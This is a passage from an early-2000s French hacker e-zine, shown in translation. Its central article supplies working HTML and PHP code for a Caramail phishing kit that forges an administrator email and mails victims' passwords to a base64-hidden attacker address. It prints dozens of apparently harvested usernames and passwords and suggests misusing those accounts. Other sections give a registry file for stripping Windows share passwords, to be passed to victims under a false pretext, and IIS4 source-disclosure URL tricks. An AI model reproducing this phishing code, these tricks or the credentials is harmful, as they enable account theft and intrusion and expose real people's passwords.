begin
for cpt:=1 to length(phrase) do
begin
if ( inint(key[cpt]) and inint(phrase[cpt]) ) then
begin
choice:=(ord(phrase[cpt]) mod 65) - (ord(key[cpt]) mod 65);
if choice<0 then choice:=choice+26;
res := res + chr(choice+65);
end
else res:=res+phrase[cpt];
key:=key+res[cpt];
end;
writeln('--Result of decryption--');
writeln(res);
end;
write('Press enter to exit');
readln;
end.The program is attached with the mag, it's crypto.exe, no values to pass as argument, there is a menu etc... I hope this article will have you more.
The Caramail Hack
You will be disappointed, for sure, but this method no longer works (at least it depends on its host ;-) So what is it? Well remember, HZV had put in one of their number a technique which allowed to send a fake email supposedly coming from the caramail administrator and which invited the victim to enter his login and password in order to validate his account otherwise his personal data would be erased. This therefore relied on social engineering (passing oneself off as someone else in order to obtain confidential information) and on the mail() function of multimania allowing one to forge one's emails.
An error had slipped into the magazine, or rather an oversight (intentional?) which meant that the person did not receive the document in html but in text!!!
Imagine the victim who receives the source of the fake email!! In short how to pass for a big sucker !!! In fact it was enough just to add the MIME type which is used in quite a few domains of the internet (in HTTP requests for example :-) but also for emails: this makes it possible to describe the content of the attachment.
There are many MIME types such as jpeg image, gif image, pdf document, html, text, text/html, sound wave...
Most of the viruses that we receive by mail are also misleading on their MIME type so as not to frighten the victim (c more reassuring to see word document marked than com application).
Anyway after some research g was able to fix the bug and it worked very well, by the way here are some login / pass that g was able to collect:
lolode— thib
inkubus— muse
sophie.port —paris
fildar65— 8185
bullglow —djglobule
latina.boop— katty
paulans— 091185
lovetaze —6880
starlette61 —lini
dragounette-de.flamme —dragonbleu
julien-feron —0478964979
alexandre.mathieu1 —magali
titlopia — PoissonsRouge5
spegell —6167
mduc2 —lolo
fofydeesse —12345
toxikzoe —210181 64dragon
—demon laurent1224
—vanessa vishnou82
—mouchtrav le_scarla2
—purew iisnogud
—isnogud
erasor78 —cacafg
n.ais —muzdalifa
the_killer102 —scream
kenny585 —070371
dauberic —mai1965
djeep11 —durejp
than7 —77170
wkarl1 —11031977 2ROOL
—041284 tommedeterre
—bigoudi
llorrenzo1 —800826
miko_93 —mico
mimiche95 —00
miss_catastrophe3 —melissa
le_bon_michel —003440
nicedevil06 —1234
Merlu11 —Breizh
karamello —karamello
fred.thekiller1 —fred
tiopin —fcporto
stephane.spiess— steph2
mkiane —julien
b.reignault —doudou
tou.toule —usher
We quickly notice that the most used passes are: the first name of the person, the first name of the loved one or even a word related to the password (the guy who wanted iznogud as his login was to fall back on iiznogud which was free, then there was every chance that he would take isnogud as a pass since he had not been able to take it as a login because he had already taken it). When we look at this list we realize how little mistrust users show. There is even one who put his phone number!!!!
G hesitated to put these passes but they are there, you can create forums in their name (like fist fucking, sadomazo pleasure... :-) Note that apparently if the victim is on the chat and you connect on his account then the chat goes off on its own. But I always closed it on startup and so I don't know what it does :-(
Well, I didn't write an article to repeat by text what was going on in HZV!! In fact what I wanted was to make a caramail hack service on my site which allowed by just entering his login and that of the victim to obtain his pass. In short, something that any idiot could have used!!
G had a lot of trouble doing this thing. The part of sending the form went very well. The only problem is that the address where the victim's password should return is not included in the php file.
It was therefore necessary to ensure that the address of the attacker was stored somewhere. The only solution g found was to put the hacker's address in the source of the form.
Obviously there you say to yourself: "C suck it will be seen right away !!". Eh eh !! Not if this is encrypted!! G chooses a very basic encryption on the web, the base64. This allows 90% of the population to be out of the game (even more because if you take 20 people there is a good chance that none of them know this encryption mode :-)
Of course there are other, more advanced encryption methods, but I like knowing that someone who knows about it won't get hacked. All this is done in a very simple way in php because these are functions already implemented in the language. So the victim receives the form; inside 2 fields to fill: login and password but also a hidden field whose value is the encrypted return address. The victim then presses a submit type button which will call a script on our site (and there, sorry, it is impossible to hide this address from someone who would display the html source). This script decrypts the address and sends the data there... Hacked!!!
At least in theory because the lycos/multimania merger caused a lot of shit!!! Everything is safer!!! Let me explain, the POST method is more discreet than the GET method.
The POST sends the data almost transparently (at the limit we see "opening of ww.multimania.com/monsite/monscript.php" for 2 seconds) while the GET method opens a new window and we see the data displayed in the navigation bar (like "www.multimania.com/monsite/monscript.php?hacker=moi@serveur.com&victime=toi@serveur.com&password=tonpass") in short, it's not super discreet.
The form therefore sent with the POST method. Where there is a big bug c that multimania decided that only data coming from a POST of multimania would be accepted and all the others would not pass. So the data coming from an email in memory on cara... we can put them where we think.
I think the verification is done at the level of the referer (you must have read the article on the http) but I would check that.
G took quite some time to understand why an online form on multi managed to send data and not the one on my HD.
So how do you overcome this protection? G tried putting a base href=www.multimania.com but it didn't work. It would be necessary to succeed with a system of frames to redirect the victim to an online page. Or much easier to find a host other than multimania that accepts the mail( ) method; it must exist!!
By the way g is saying something stupid: the MIME type only gives a (necessary) precision on the content because the content is marked by the Content-Type but without a version of the MIME it doesn't work, weird doesn't it?
Anyway the files are with the zine.
hackcara.htm is the file to put online (the one offering the service)
<html>
<head>
<title>Caramail Hacking 2002 by Sirius Black</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#3399FF" text="#000000">
<div align="center">
<p><font size="2">Caramail Hacking</font></p>
<hr>
<form name="form1" method="post" action="hack.php">
<p><font size="2">Entrez votre adresse email <u>COMPLETE</u></font> :
<input type="text" name="hacker">
</p>
<p><font size="2">Entrez le login cara de la victime : </font> <font size="2">
<input type="text" name="victime">
@caramail.com</font></p>
<p>
<input type="submit" name="Submit" value="Submit">
<input type="reset" name="Submit2" value="Reset">
</p>
</form>
<hr>
<p> </p>
</div>
</body>
</html>hack.php is the script that sends the data
<?php
$victime.="@caramail.com";
$tmp=base64_encode($hacker);
$headers.="From: admin@caramail.com\n";
$headers.="Mime-Version: 1.0\n";
$headers.="Content-Type: text/html\n";
$text.="
<center><img src=\"<br><font">http://imgsrv.caramail.com/images/caramail.gif\"><br><font face=arial>
Comme vous le savez peut-Ítre, nous avons<br>
depuis quelques semaines des problËmes de type DOS-B5<br>
sur notre serveur. La totalitÈ des comptes va disparaitre.<br><br>
Pour eviter cela, veuillez remplir le formulaire ci-dessous<br>
afin de rÈactualiser vos donnÈes auprËs du serveur.<br></center>
Merci de votre comprÈhension.<br>
Cordialement.<br>
L'Èquipe Caramail<br>
<form method=\"POST\" action=\"http://www.multimania.com/lotfree2/confirm.php\">
Login :
<input type=\"text\" name=\"login\">
Mot de passe :
<input type=\"password\" name=\"pass\">
<input type=\"hidden\" name=\"TZ\" value=\"$tmp\">
<input type=\"submit\" value=\"Envoyer\">
</form>";
mail("$victime","Identification","$text","$headers");
echo "victime = $victime - hacker = $hacker - tmp = $tmp";
?>confirm.php is the one that retrieves them
<?php
$hacker=base64_decode($TZ);
mail("$hacker","Identification successfull","Login = $login - Password = $pass","From:se@lotfree.com");
echo "$login : Mise a jour rÈalisÈe avec succËs";
?>For the very newbies: the scripts are text, read them with notepad, wordpad or other...
If you know a host that accepts mail() contact me at sirius.black@lycos.fr
Articles from OS4M4CKERS
As I said in editorial two, I got help (finally) from OS4M4CKERS. In order not to modify what he was going to do (colors, layout....) I left the page he had made as it is, you can access it here.
**********************************************
**** Delete file share password ****
**************************************** *******
I'm going to talk to you today about reg files which can be very useful for breaking into a PC. Especially when you use the NBTSTAT, and when you fall for once on a PC which has a file sharing and well there you are confronted with a password.
So before removing the password, I will tell you what these reg files are.
So reg files are files that allow you to make changes to the registry, where almost all of your windows configuration is stored.
The syntax of a reg file is very easy, namely:
REGEDIT4
[The path where the string and binary values are separated by "\"]
"the name of the string value"="its value"
"the name of the dword or binary"=dword or hex:its value
You must just respect the quotation marks.
Alright now we can start our hack.
When you share your files, there are several things that change in your registry, and it is in this location:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\(shared hard drive letter)
that all the share passwords are stored, and more precisely:
it is the binary value: "Parm2enc" which contains the read-only password.
and "Parm1enc" which contains the full access password.
Now we just have to make our reg file, to do it go to:
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C"
and there you click on the "C" key then on " Registry" (in the menu) then on "Export a file from the registry", this is where you give it the name you will say.
If you don't have a file share, copy this passage directly and rename it to "n'importe_quoi.reg"------------Cut here---------------------------
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Network\LanMan\C]
"Flags"=dword:00000102
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"= ""-----------Cut here----------------------------
I want to point out that this reg file is used to remove the password, if you want to change the password I think you must know how to do it.A few remarks:
-You just have to give the reg file to the guy and tell him that it will speed up his connection.
-If you are unable to know the equivalence of characters (letters or numbers) in hexadecimal, you just have to ask me, I will send them to you or they will be published in the next one (if there is a next ).
**************************
**** ASP Rifts ****
************** ************
ASP (Active Server Pages) is a scripting language developed by Microsoft, but like everything made by Microsoft it suffers from many bugs.
These bugs will be used for example to see the source code of an asp page (.asp), or of the "global.asa" fileLe code source d'une page ASP
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Avoir le code source de certaine pages ASP peut se révéler trés utile, car il existe des formulaires qui nous envoies vers une page ASP, donc si on se procure le code source de cette page, on peut connaitre l'emplacement de la base de donnée ou sont stoker par exemple les logins et passwords d'un service mailing par exemple.
Donc si l'emplacement de la page ASP est:
http://www.nomdusite.com/lapage.asp
Et bein il faudra ajouter "::$DATA" à la fin de l'URL donc ça devient:
http://www.nomdusite.com/lapage.asp::$DATA
Sinon il y a une autre solution c'est de saisir l'adresse suivante:
http://www.nomdusite.com/null.htw?CiWebHitsFile=/lapage%20&CiRestriction=none&CiHiliteType=FullThe source code of the global.asa file
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
But sometimes the source code of a ASP page does not refer to a database, but to a DSN (Data Source Name), it is the virtual name of the database.
So the global.asa file can help you (I say "can help you") to know the name (therefore the location), the user and the login of the database; to have the source code of this file it is necessary to enter the following address:
http://www.nomdusite.com/global.asa+.htr
After that you display the source.
You should know that it's Microsoft's IIS4 server (you surprise me!!) that suffers from this flaw, but Microsoft has offered a patch to correct this error.
But I even managed to find a site that still suffers from this flaw, it's the CERIST site, but the admin didn't hang around (3 months ;-) to remove the flaw.
NB: If there are people who know CERIST, I kindly ask them to contact me.*******************************
**** Read other people's mails ****
****** *************************
You must certainly know this method, but there are also people who do not know it.
As you know, all the web pages you consult are stored by default in the folder: C:\WINDOWS\Temporary Internet Files
So all the mails you read are also stored in this same folder, but not in html format (I talks about the extension), but you can like even open them with MSIE.
But there is a catch, because you can only read viewed mails, but you couldn't for example send mail or access anything else not viewed.
This method is useful in cyber cafes, where people do not systematically delete the contents of their folder.
Made by OS4M4CKERS :
www.DarkWebZONE.fr.st (Under construction)
Lyrics: Lower by NOFX
For this number I chose you Lower by NOFX, firstly because NOFX rocks and then because this song is much more than a simple song, it's a state of mind: the state of mind of the loser, or rather of the one who does not want to place himself in front of others. It's a state of mind that I share: not to participate in the competition... Here are the lyrics:
I will never feel the ribbon break
I will never taste sweet victory
I don't want to leave the rest behind
I don't want inscription on a plaque
Never first or second place
I won't ever run your rat race
I will always be lower than you
I won't be your competition
Lowest totem pole position
Is where I'd rather stay than be like you
Be the best, climb the ladder
Do it better, Higher, Faster
I refuse to participate
If I go up it will be slow
I'm bringing everyone I know
Ans stopping on the siwth or seventh rung
On a pedestal, isn't the view great
You better watch your step
Cause it's a nasty fall
When no one's there to catch you when you call
Conclusion
Well in conclusion, it's the best of the first three issues (at least I think). A web protocol, a file on the CCC, one on cryptography, an article on the generalized cara hack and then the guest articles of this issue: OS4M4CKERS. Without forgetting the eternal Punk lyrics section. Otherwise I still need help for the next issues (if you want LOTFREE to continue ;-). There will probably be a number 4 but maybe not 5 unless you help me. In fact I finish the conclusion one is June 24, 2002 at 11 hours 14 minutes and 41 seconds. In short, I had a lot of trouble on this zine (mainly because of the cara article).
Here are some article proposals for those who want to write for the 4:
- You are an IRC programming pro, you are able to clearly explain the syntax (variables, conditionals, loops, instructions...) and that with the help of examples: send us your article!
- You know how to program rezo progs, make us a telnet connection simulator: opening a port, waiting for a connection, sending a login/pass request and retrieving valuable information, with the source of course. Your item will be received with immense joy :-)
- You are a pure phreaker and have been for a long time, you are able to say where the French scene is, where France Telecom technology is, what is still possible today, what is no longer possible...
- Still in the rezo prog, you are able to code a prog requesting data, a url and which sends the information to the given url via the POST method.
- You want to write, period so send your article and it will go very well like that :-)
END
